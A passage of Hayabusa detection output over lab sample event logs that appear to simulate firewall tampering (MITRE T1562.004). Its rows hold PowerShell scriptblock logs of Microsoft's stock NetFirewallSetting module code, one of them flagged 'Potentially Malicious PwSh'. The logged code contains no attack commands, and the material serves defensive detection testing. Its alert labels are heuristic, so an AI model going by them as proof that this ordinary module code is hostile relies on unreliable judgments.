Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' -Alias '*' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, 
[Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = 
${EnableStatefulPptp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$_",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.531 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"_cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = 
$null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent 
= $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.531 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"_cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 
'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false 
if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = 
